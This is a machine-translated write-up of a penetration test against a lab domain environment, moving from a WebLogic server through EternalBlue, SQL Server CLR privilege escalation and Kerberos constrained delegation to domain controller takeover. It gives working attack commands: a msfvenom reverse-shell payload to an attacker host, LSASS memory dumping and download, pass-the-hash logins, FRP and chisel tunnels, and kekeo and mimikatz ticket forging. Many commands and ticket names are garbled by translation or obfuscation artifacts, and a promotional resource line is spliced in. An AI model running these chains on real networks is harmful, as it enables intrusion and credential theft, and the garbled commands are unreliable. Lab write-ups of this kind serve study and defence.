preface
This paper records a penetration test process for a domain environment with a two-layer Intranet, and relates to the basic methods, ideas and skills of Intranet domain penetration. MSF, CobaltStrike, FRP, chisel, SharpSQLTools and other tools were used alternately. Finally, the domain control was taken down by constraint delegation. During the use of a lot of small tools, the article is long, the following began the long journey of infiltration.
The network topology is as follows:
The web server
First wave port scan:
We found the IP address of the internal network directly. It needs to be explained in advance that weblogic can only resolve the IP address 10.10.20.12 due to the problem of building the shooting range, so we need to adjust the IP setting. We will change it back to section 192 after finishing weblogic.
【 a > all resources to obtain < a 】 1, a lot of 200 out of print e-books have not been bought 2, 30G security factory inside the video materials 3, 100 SRC documents 4, common security comprehensive questions 5, CTF contest classic topic analysis 6, the full kit
See the Weblogic version, look up exp, and start a wave of SMB information collection.
SMB Information Collection
Smbmap -h 10.10.20.12
The smbclient - N - L / / 10.10.20.12
Enum4linux -a 10.10.20.12
Rpcclient -u '10.10.20.12
Smbclient -u "-l \10.10.20.12
Exploit weblogic vulnerabilities
If you know the specific version of WebLogic, you can directly search for vulnerabilities or use tools to scan them automatically.
Here is a direct CVE vulnerability to play a wave;
Msfvenom -p Windows/x64 meterpreter/reverse_tcp LHOST = 10.10.20.4 LPORT = 1234 - f PSH - CMD > exploits, ps1
# use exploits/multi/handler # set content Windows/x64 meterpreter/reverse_tcp # set lhost 10.10.20.4 # set lport # 1234 exploitCopy the code
Migrate the next process and start to capture the password.
Blast a wave, the original is a weak password;
Now it’s easier to switch to CS;
. / the teamserver 192.168.223.138 123456
java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xmx1024M -javaagent:hook.jar -jar cobaltstrike.jar
A wave of information collection;
Weblogic data decryption
In the following introduction to the method of fetching hash with the registry;
Drag back to local after successful capture;
Decrypt locally;
Now that we have hash here, try to penetrate without MSF and CS;
Evil - winrm - u administrator - H ccef208c6485269c20db2cad21734fe7 -i 192.168.223.165
get-process -name lsass
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 500 C:\temp\lsass.dmp full
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 500 C:\windows\temp\lsass.dmp full
ls C:\windows\temp\lsass.dmp
download C:\windows\temp\lsass.dmp
Copy the code
Lsass. DMP renamed to weblogic.dmp
pypykatz lsa minidump weblogic.dmp -o weblogic.txt
Did not find the expected password, so let’s try another method;
Decryption tool can decrypt now;
Now that the Web server is out of the way, let’s start infiltrating personal hosts.
Individual host
Eternal blue use
When you access the Intranet, the personal host cannot go out of the Intranet directly, and you need to set up an agent.
FRP agent
The service side
[common]
bind_addr =192.168.223.138
bind_port =7000
token = Xa3BJf2l5enmN6Z7A8mv
[socks5]
type = tcp
remote_port =7777
plugin = socks5
Copy the codeThe client
[common]
server_addr = 192.168.223.138
server_port = 7000
token = Xa3BJf2l5enmN6Z7A8mv
[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5
Copy the codeProxychains nmap - v - Pn - T3 - sV - n - sT - open - 45,23,21,445,135,139,5985,2121,3389,13389,6379,4 p, 22122, 2222, 2223 9,53,995,8140,993,465 505143 3330 6500 0523 6590 0543 2152 1109, 878700, 1389902119, 4108 0,88 10.10.20.7Copy the code
You can also try chisel here;
./chisel server -p 8000 --reverse
. / chisel client 192.168.223.138:8000 R: 8100: socks
Set up the proxy configuration in Kali;
Proxychains Nmap --script SMB-vuln * -p 445-ST-PN 10.10.20.7-VVV
Obviously, eternal blue; FRP proxy is used here, and MSF is used for convenience.
Msf6 > setg Proxies socks5:192.168.223.138:7777 msf6 > setg ReverseAllowProxy true msf6 > use Exploits/Windows/SMB/ms17_010_eternalblue msf6 > set content Windows/x64 meterpreter/bind_tcp msf6 > set rhost 10.10.20.7 msf6 > runCopy the code
The success of the personal host, as usual catch the password;
Here in the introduction of another capture password ideas, in the target machine capture back to the local decryption analysis, in some cases will have a miracle effect;
Fetch local, minidump unpack
View results;
For convenience, we can continue with CobaltStrike, although MSF and CS sessions are interoperable, but I prefer to use them directly after stud. Here the Web server has been bounced on CS in advance, the essence is the CS transfer function.
Because this Win7 does not go online, then only through CobaltStrike Settings transfer:
Create a relay listener first:
Generate Trojan:
Upload and run the Trojan horse using MSF.
A wave of information collection;
You can see that there are two machines behind the personal host, namely the domain controller server and the database server. The secondary agents need to be set up before the next step of infiltration.
Secondary agent setup
Take a look at how FRP builds a secondary proxy;
Configure server on kali;
Configuration on the Web server; (One server, one client)
Configure the client on the personal host.
Scan test;
Building a level 2 agent with Chisel;
Configure server on kali;
Configure the client and server on the Web server.
Configure the client on the personal host.
Scan test;
Proxychains NMAP-SC-SV-F-ST-PN 10.10.10.18-VVV
Database server
Bloodhound will be used to analyze the domain environment to determine the next step in infiltration. The installation and use of the domain will not be covered here, as I covered in previous articles.
Shortest path to the domain administrator;
Red /sqlserver allows to delegate OWA cifs services (DC controller)
At this point, we have the following basic idea of infiltration, that is, to take down the domain control by delegation attack.
Collect information based on the previous port scanning results.
Combined with the personal host control we already have, first of all the current process is domain-free, so give up token stealing for now:
In a nutshell, in Windows, there is no Delegation TAB in the properties of a normal user, only a service account and a host account. A Service Account is a type of user in the domain. The Account used by the server to run the Service, run the Service, and add the Service to the domain. For example, during the installation of MS SQL Server, the service account SqlServiceAccount is automatically registered in the domain. This account cannot be used for interactive login. (Please fill in the details by yourself)
Since we have obtained the account password of a domain user, try to find the constraint delegate user:
Exe -h 10.10.10.8 -u Saul up admin! @#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds- allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegatetoCopy the code
Sqlserver user is set constraint delegate, but also need password; Before knowing 1433 is open, try blasting a wave;
This allows you to execute the xp_cmdshell command;
The discovery permission is only a common service permission.
Enable target CLR using SharpSQLTools :(to hang agent using Proxifier, do not take screenshots)
Exe 10.10.10.18 sa sa master install_clr whoami
Then enable and invoke the command:
Sharpsqltools. exe 10.10.10.18 sa sa master enable_clr
Sharpsqltools. exe 10.10.10.18 sa sa master clr_efspotato whoami
Extraction succeeded.
The following uses MSF to upload files;
Upload a CS Trojan;
Then in the use of high permissions to run cs Trojan;
Successful online;
Grab the password;
At this point, the database server infiltration is complete, and the domain control infiltration begins.
Domain control
After the previous analysis, this is purely about taking down the domain control using the constraint delegate.
1. Use kekeo to request the user’s TGT:
[email protected][email protected]
kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"
2. Then use the TGT
([email protected][email protected]) Obtain the ST of the domain machine: [email protected]@REDTEAM.RED_cifs~owa.redteam [email protected] kekeo.exe "tgs::s4u /tgt:[email protected]_krbtgt~redteam.red@REDTEAM. RED.kirbi /user:[email protected] /service:cifs/owa.redteam.red"Copy the code3. Run mimikatz to import ST2 into the current session.
mimikatz kerberos::ptt
[email protected]@REDTEAM.RED_cifs~owa.redteam
[email protected]
Copy the code
Successfully obtain domain control rights.
